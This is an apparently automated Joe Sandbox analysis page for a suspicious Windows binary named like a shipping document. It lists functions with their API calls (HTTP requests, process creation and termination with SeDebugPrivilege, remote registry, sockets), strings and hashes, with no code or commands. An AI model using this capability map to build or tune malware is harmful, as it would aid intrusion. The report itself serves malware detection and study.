HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006D46BF
InternetCloseHandle.WININET(00000000), ref: 006D4706

Part of subcall function 006D5052: GetLastError.KERNEL32(?,?,006D43CC,00000000,00000000,00000001), ref: 006D5067

Strings

, xrefs: 006D46B8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: db089175916883a4dda5a1cc78a72ce41a8ae266e86e75f22a71e728b8d04b4b
Instruction ID: b806970a86c265b999aee9a24ececb87fa2b69b602450ffef70bb940c9bf1ace
Opcode Fuzzy Hash: db089175916883a4dda5a1cc78a72ce41a8ae266e86e75f22a71e728b8d04b4b
Instruction Fuzzy Hash: 77415EB1901205BFEB119F90CC85FFA77ADEF09354F00811AFA069A281DBB4DD458BA8

Function 006DB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0071DC00), ref: 006DB715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0071DC00), ref: 006DB749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006DB8C1
SysFreeString.OLEAUT32(?), ref: 006DB8EB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 41ced1e25bc5e5217aca4bf758e0205394b1839c1d4724fa7e5f1220696a8c79
Instruction ID: 70613811ef1c5f281dbbee32f643fc5c7565e57afb4819a89699dc17844b9ee7
Opcode Fuzzy Hash: 41ced1e25bc5e5217aca4bf758e0205394b1839c1d4724fa7e5f1220696a8c79
Instruction Fuzzy Hash: 0AF11675E00209EFCB14DF94C884EAEB7BAFF49311F158599F905AB254DB31AE42CB90

Function 006E24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006E24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006E2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006E26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006E26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006E270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006E286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006E28A1
CloseHandle.KERNEL32(?), ref: 006E28D0
CloseHandle.KERNEL32(?), ref: 006E2947

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: c9b6af6c3da629c21ac835ad235cae9b70ea1bf56d488f8fcb502d2fed221e22
Instruction ID: 039641e357b0cb2b335743970a6368ba6a690935922ae44d386bab7d54580187
Opcode Fuzzy Hash: c9b6af6c3da629c21ac835ad235cae9b70ea1bf56d488f8fcb502d2fed221e22
Instruction Fuzzy Hash: 95D1C131205341DFCB54EF25C861A6ABBEBAF84320F14855DF8959B3A2DB30DC45CB56

Function 006EB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006EB3F4

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 5f065284018dd0d132190c165ca49c2053a91558a00843a1f92359fc19ae8cb0
Instruction ID: 3359e16b148005b4dce7691ddca27455406b257995cbc450d485fcda2a165d45
Opcode Fuzzy Hash: 5f065284018dd0d132190c165ca49c2053a91558a00843a1f92359fc19ae8cb0
Instruction Fuzzy Hash: 2D51E630502384FFEF309F66CC8AB9F3BA6AB05354F646115F614D62E1CB71E9408B59

Function 0069A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006FDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006FDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006FDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006FDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006FDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0069A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 006FDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006FDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0069A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 006FDBC8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 338eae6014341815f619f67ae242ce0aff975e0969ec7dff30880645abd6412c
Instruction ID: c3bb10a715321a8794136a5be8ec7a07e8fe8bba79512e1f783930c4bf568b80
Opcode Fuzzy Hash: 338eae6014341815f619f67ae242ce0aff975e0969ec7dff30880645abd6412c
Instruction Fuzzy Hash: 3F516D74600308EFDF20DFA4CC81FAA37FAAB08750F114619F9469A690DB74ED91DB95

Function 006C7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006C5FA6,?), ref: 006C6ED8

Part of subcall function 006C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006C5FA6,?), ref: 006C6EF1

Part of subcall function 006C72CB: GetFileAttributesW.KERNEL32(?,006C6019), ref: 006C72CC

lstrcmpiW.KERNEL32(?,?), ref: 006C75CA
_wcscmp.LIBCMT ref: 006C75E2
MoveFileW.KERNEL32(?,?), ref: 006C75FB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: a4b0a792f4dda274d56762f4da12befba04775c54342547e1be6e84482ebf2bc
Instruction ID: 6efa1b321c96de8a5023407764d16e98eb16a68a4402a29087923f7e5bd97336
Opcode Fuzzy Hash: a4b0a792f4dda274d56762f4da12befba04775c54342547e1be6e84482ebf2bc
Instruction Fuzzy Hash: E35100B2A092199ADF90EB94D841EED73BDEF09320F00419EF605E3141EA7497C5CF64

Function 0069EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,006FDAD1,00000004,00000000,00000000), ref: 0069EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,006FDAD1,00000004,00000000,00000000), ref: 0069EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,006FDAD1,00000004,00000000,00000000), ref: 006FDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,006FDAD1,00000004,00000000,00000000), ref: 006FDCF2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 35e44cd84897f263b7db79af450146ffb34bec62a6d2a121200d2c437ff2ced8
Instruction ID: 4b26a9aab5d1bcc341097f7caf588b43a845d0229b52ea9061295ef1ad48c489
Opcode Fuzzy Hash: 35e44cd84897f263b7db79af450146ffb34bec62a6d2a121200d2c437ff2ced8
Instruction Fuzzy Hash: 3041E670205780EBDF35DB288F8DABA7A9FBB42315F19540DE14782E69CA77B881C315

Function 006BB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006BAEF1,00000B00,?,?), ref: 006BB26C
HeapAlloc.KERNEL32(00000000,?,006BAEF1,00000B00,?,?), ref: 006BB273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006BAEF1,00000B00,?,?), ref: 006BB288
GetCurrentProcess.KERNEL32(?,00000000,?,006BAEF1,00000B00,?,?), ref: 006BB290
DuplicateHandle.KERNEL32(00000000,?,006BAEF1,00000B00,?,?), ref: 006BB293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006BAEF1,00000B00,?,?), ref: 006BB2A3
GetCurrentProcess.KERNEL32(006BAEF1,00000000,?,006BAEF1,00000B00,?,?), ref: 006BB2AB
DuplicateHandle.KERNEL32(00000000,?,006BAEF1,00000B00,?,?), ref: 006BB2AE
CreateThread.KERNEL32(00000000,00000000,006BB2D4,00000000,00000000,00000000), ref: 006BB2C8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 49a73407be538b29cfd15b842f02ce30eff1a94b92aa08890dd5fedb4bac3f3e
Instruction ID: 7d46f27895c2a3f50c337b0fc46751089c042adb90d33d1ac4321bcd9f432057
Opcode Fuzzy Hash: 49a73407be538b29cfd15b842f02ce30eff1a94b92aa08890dd5fedb4bac3f3e
Instruction Fuzzy Hash: 8C01A8B5240308FFE620ABA5DC49F6B7BACEB88711F018511FA05DB1A1CAB49C008B65

Function 006DC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 006DC876, 006DC887
Not an Object type, xrefs: 006DC49E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: d03c55d00c7b7f1f502ac58fb504df01e9e20c9ef97e0a84fa6b9554711e9a11
Instruction ID: 1d72d2a7f75f64b00f6376b6cfa86fca3822f1ffa234d0941c8e98a3b9c5ec05
Opcode Fuzzy Hash: d03c55d00c7b7f1f502ac58fb504df01e9e20c9ef97e0a84fa6b9554711e9a11
Instruction Fuzzy Hash: 4AE19F71E0021AABDF14DFA4D895EEE77B6EF48324F14812AE905AB381D770ED41CB94

Function 006D16DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

Part of subcall function 0069C6F4: _wcscpy.LIBCMT ref: 0069C717

_wcstok.LIBCMT ref: 006D184E
_wcscpy.LIBCMT ref: 006D18DD
_memset.LIBCMT ref: 006D1910

Strings

X, xrefs: 006D1948
p2sl2s, xrefs: 006D1920

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2sl2s
API String ID: 774024439-350979443
Opcode ID: f78ec70e08c3a85cbcd367a3035775e6593624bc319f0da334101a8b6ccfa5d7
Instruction ID: 666418ac6848bb016aed8d336490006e44540bff4919a5c0254d9ac9c1ab640c
Opcode Fuzzy Hash: f78ec70e08c3a85cbcd367a3035775e6593624bc319f0da334101a8b6ccfa5d7
Instruction Fuzzy Hash: ADC193319043409FC754FF24C851A9AB7E6BF45350F044A2DF99A9B3A2DB70ED05CB96

Function 006E9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006E9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 006E9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006E9B47
_wcscat.LIBCMT ref: 006E9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 006E9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 006E9BE7

Strings

SysListView32, xrefs: 006E9AEB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 7441c4a26aed1ab120728e15d5ed061b6b7f319600387d5a080e41e1ad8a7cec
Instruction ID: 75d8ed5d5301e42b35e880fa71c598befb7b5c60b41f2f7b394e3be2cae594b0
Opcode Fuzzy Hash: 7441c4a26aed1ab120728e15d5ed061b6b7f319600387d5a080e41e1ad8a7cec
Instruction Fuzzy Hash: 9C41C170900348EFEB219FA8CC85BEE77BAEF08350F10452AF545A7292D7759D84CB64

Function 006E172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 006C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006C6554
Part of subcall function 006C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 006C6564
Part of subcall function 006C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006C65F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E179A
GetLastError.KERNEL32 ref: 006E17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 006E1855
GetLastError.KERNEL32(00000000), ref: 006E1860
CloseHandle.KERNEL32(00000000), ref: 006E1895

Strings

SeDebugPrivilege, xrefs: 006E17B8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 82a03826dfab5392d2209c2cae2ba75a5693c8eb4331fa50c41be3b305f0e86d
Instruction ID: fd8323682fa0b069c3ff7a19a8f4f9a2e76abfd3c0de619b42242e3d4d6b9c71
Opcode Fuzzy Hash: 82a03826dfab5392d2209c2cae2ba75a5693c8eb4331fa50c41be3b305f0e86d
Instruction Fuzzy Hash: F441BE72600201AFDB15EF94C9A5FBEB7A6AF05710F04805CF9069F3C2DB78A941CB99

Function 006C5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 006C58B8

Strings

warning, xrefs: 006C58A1
info, xrefs: 006C5859
question, xrefs: 006C5871
stop, xrefs: 006C5889
blank, xrefs: 006C583A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 701b0e28124b3111759ff3d29845fc2ae59a3405897e048b14f507a45ef08724
Instruction ID: 552df5511908006921b407861c5e7e7955197e0de3d1ade5b20dc0773140134c
Opcode Fuzzy Hash: 701b0e28124b3111759ff3d29845fc2ae59a3405897e048b14f507a45ef08724
Instruction Fuzzy Hash: 1811EB7520AB56FEF7116A549C82EBA239EDF15320F30003FF902E5382E764BE804668

Function 006CA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 006CA806

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 7a16be65f420596c62f937a186e10a2dac8b93d27b27dca9b39f04ecc47d7200
Instruction ID: 2a6e73502d03f8c061d58ce3d8d774c18936a9a0511686ea92e25a79808e8009
Opcode Fuzzy Hash: 7a16be65f420596c62f937a186e10a2dac8b93d27b27dca9b39f04ecc47d7200
Instruction Fuzzy Hash: F2C15875A0120A9FDB10DFD8D481BBEB7B6EF08319F20806DE606E7341D734A942CBA5

Function 006C6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006C6B63
LoadStringW.USER32(00000000), ref: 006C6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006C6B80
LoadStringW.USER32(00000000), ref: 006C6B87
_wprintf.LIBCMT ref: 006C6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006C6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 006C6BA8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 8d7054e77ddf7502dc383aa498f519e18cf9b8536da32b3b40fa4279ee4356a7
Instruction ID: e3c857456ef7c24205d41b90c426cb88c8550c6242355ceb52b9f39dc0e9e25f
Opcode Fuzzy Hash: 8d7054e77ddf7502dc383aa498f519e18cf9b8536da32b3b40fa4279ee4356a7
Instruction Fuzzy Hash: 530112F6500318BFE721ABD4DD89EF6766CD708304F0085A5B745D6041EE789E848F78

Function 006E2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006E2BB5,?,?), ref: 006E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006E2BF6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 0ff45760d0663494cc78b9a4c57a6467131724cc4b4f01cc5334a3628267dc8b
Instruction ID: d357b80ae6fa07ca134b45f112afb6e0c3f19446140a348abe06aa3f3d025757
Opcode Fuzzy Hash: 0ff45760d0663494cc78b9a4c57a6467131724cc4b4f01cc5334a3628267dc8b
Instruction Fuzzy Hash: 8891BC712053029FCB40EF55C8A1B6EB7EAFF88310F14891DF996872A1DB34E905CB46

Function 006D95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 006D9691
WSAGetLastError.WSOCK32(00000000), ref: 006D969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 006D96C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006D96E9
